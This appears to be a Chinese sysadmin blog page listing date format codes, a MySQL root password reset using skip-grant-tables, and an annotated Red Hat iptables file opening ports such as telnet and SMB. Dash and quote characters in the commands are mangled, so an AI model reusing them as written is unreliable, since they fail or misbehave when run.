% b 月的简称(Jan..Dec)
% B 月的全称(January..December)
% c 日期和时间( Mon Nov 8 14:12:46 CST 1999)
% d 一个月的第几天(01..31)
% D 日期(mm/dd/yy)
% h 和%b选项相同
% j 一年的第几天(001..366)
% m 月(01..12)
% w 一个星期的第几天(0代表星期天)
% W 一年的第几个星期(00..53,星期一为第一天)
% x 显示日期的格式(mm/dd/yy)
% y 年的最后两个数字( 1999则是99)
% Y 年(例如:1970,1996等)
注意:只有超级用户才有权限使用date命令设置时间,一般用户只能使用date命令显示时间。
Access denied for user 'root'@'localhost' (using password: NO)
# /etc/init.d/mysql stop
# mysqld_safe ——user=mysql ——skip-grant-tables ——skip-networking &
# mysql -u root mysql
mysql> UPDATE user SET password=PASSWORD(’newpassword’) where USER=’root’;
mysql> FLUSH PRIVILEGES;
mysql> quit
# /etc/init.d/mysql restart
# mysql -uroot -p
Enter password: <输入新设的密码newpassword>
mysql>
2012年12月2日星期日
iptables配置文件的格式语法
#头两行是注释说明
# Firewall configuration written by system-config-securitylevel
# Manual customization of this file is not recommended.
#使用filter表
*filter
#下面四条内容定义了内建的INPUT、FORWAARD、ACCEPT链,还创建了一个被称为RH-Firewall-1-INPUT 的新链
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:RH-Firewall-1-INPUT – [0:0]
#将所有流入的数据写入到日志文件中
-A INPUT -j LOG –log-level crit
#下面这条规则将添加到INPUT链上,所有发往INPUT链上的数据包将跳转到RH-Firewall-1 //链上。
-A INPUT -j RH-Firewall-1-INPUT
#下面这条规则将添加到FORWARD链上,所有发往INPUT链上的数据包将跳转到RH-Firewall-1 //链上。
-A FORWARD -j RH-Firewall-1-INPUT
#下面这条规则将被添加到RH-Firewall-1-input链。它可以匹配所有的数据包,其中流入接口(-i)//是一个环路接口(lo)。
#匹配这条规则的数据包将全部通过(ACCEPT),不会再使用别的规则来和它们进行比较
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
#下面这条规则是拒绝所有的icmp包-p 后是协议如:icmp、tcp、udp。端口是在-p后面–sport源端口,–dport目的端口。-j 指定数据包发送的
#目的地址如:ACCEPT、DROP、QUEUE等等
-A RH-Firewall-1-INPUT -p icmp –icmp-type any -j DROP
-A RH-Firewall-1-INPUT -p 50 -j ACCEPT
-A RH-Firewall-1-INPUT -p 51 -j ACCEPT
-A RH-Firewall-1-INPUT -p udp –dport 5353 -d 224.0.0.251 -j ACCEPT
-A RH-Firewall-1-INPUT -p udp -m udp –dport 631 -j ACCEPT
-A RH-Firewall-1-INPUT -p tcp -m tcp –dport 631 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state ESTABLISHED,RELATED -j ACCEPT
#-m state –state ESTABLISHED,RELATED这个条件表示所有处于ESTABLISHED或者RELATED状态的包,策略都是接受的。
#-m state –state NEW 这个条件是当connection的状态为初始连接(NEW)时候的策略。
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 21 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 2049 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 22 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m udp -p udp –dport 137 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m udp -p udp –dport 138 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 139 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 445 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 23 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 80 -j DROP -s 222.221.7.84
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 80 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 443 -j ACCEPT
-A RH-Firewall-1-INPUT -m state –state NEW -m tcp -p tcp –dport 25 -j ACCEPT
-A RH-Firewall-1-INPUT -j REJECT –reject-with icmp-host-prohibited
COMMIT
订阅:
评论 (Atom)
-
nginx报错nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use) 仔细参考nginx中文文档发现,发送信号USR2时,自动启动新的可执行文件,再手动启动的话就会报错 本质上也算是一种地址冲...
-
The Vps is too old to get a newer OS from the provider. create /etc/apt/sources.list.d/jessie-backports.list, and fill in the following line...
